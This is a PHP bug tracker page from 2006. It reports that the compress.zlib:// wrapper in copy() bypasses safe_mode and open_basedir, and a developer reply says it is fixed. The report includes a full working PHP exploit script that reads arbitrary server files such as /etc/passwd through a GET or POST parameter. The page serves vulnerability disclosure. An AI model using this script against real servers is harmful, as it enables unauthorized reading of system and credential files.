PHP :: Bug #37071 :: zlib exploit

Bug #37071

zlib exploit

Submitted:

2006-04-13 13:28 UTC

Modified:

2006-04-14 17:50 UTC

Votes:	2
Avg. Score:	4.5 ± 0.5
Reproduced:	2 of 2 (100.0%)
Same Version:	2 (100.0%)
Same OS:	1 (50.0%)

From:

unsecretarygeneral at gmail dot com

Assigned:

Status:

Closed

Package:

Safe Mode/open_basedir

PHP Version:

4.4.2

OS:

all

Private report:

CVE-ID:

None

View Add Comment Developer Edit

Welcome! If you don't have a Git account, you can't do anything here.
You can add a comment by following this link or if you reported this bug, you can edit this bug over here.

php.net Username: php.net Password:

Quick Fix:	(description)
	Block user comment
Status:		Assign to:
Package:
Bug Type:
Summary:
From:	unsecretarygeneral at gmail dot com
New email:
PHP Version:		OS:

New/Additional Comment:

[2006-04-13 13:28 UTC] unsecretarygeneral at gmail dot com

Description:
------------
The zlib fopen function boes not adhere to safe_mode , or open_base directory , hence an attacker can use zlib to compress 'any' file to a temp folder / world writable folder .. 

This should be critical , and is NOT fixed in the current CVS . 

Reproduce code:
---------------
Example code . : called like http://hostname/?file=/etc/passwd

<?php


$file=""; // File to Include... or use _GET _POST
$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp



echo "<PRE>\n";
if(empty($file))
{
        if(empty($_GET['file']))
        {
                if(empty($_POST['file']))
                {
                        die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like ?file=/etc/passwd\n <B><CENTER><FONTCOLOR=\"RED\">SecurityReason.Com Exploit</FONT></CENTER></B>"
);
                }
                else
                {
                        $file=$_POST['file'];
                }
        }
        else
        {
                $file=$_GET['file'];
        }
}

$temp=tempnam($tymczas, "cx");

if(copy("compress.zlib://".$file, $temp))
{
        $zrodlo = fopen($temp, "r");
        $tekst = fread($zrodlo, filesize($temp));
        fclose($zrodlo);
        echo "<B>--- Start File ".htmlspecialchars($file)."-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File".htmlspecialchars($file)." ---------------\n";
        unlink($temp);

        die("\n<FONT COLOR=\"RED\"><B>File".htmlspecialchars($file)." has been already loaded. SecurityReason Team;]</B></FONT>");
}
else
{
        die("<FONT COLOR=\"RED\"><CENTER>Sorry... File<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have access.</CENTER></FONT>");
}
?>


Expected result:
----------------
list of /etc/passwd

Actual result:
--------------
list of /etc/passwd

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports

[2006-04-14 17:50 UTC] pollita@php.net

This bug has been fixed in CVS.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.
 
Thank you for the report, and for helping us make PHP better.

The bug isn't in zlib (the inner fopen_wrapper simply passes on the options its given).  The problem is in copy() (which passes the wrong options).

5.1 already had the correct flags, but not other branches, I've applied a fix to everywhere else.

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2024 The PHP Group All rights reserved.	Last updated: Tue Apr 16 03:01:29 2024 UTC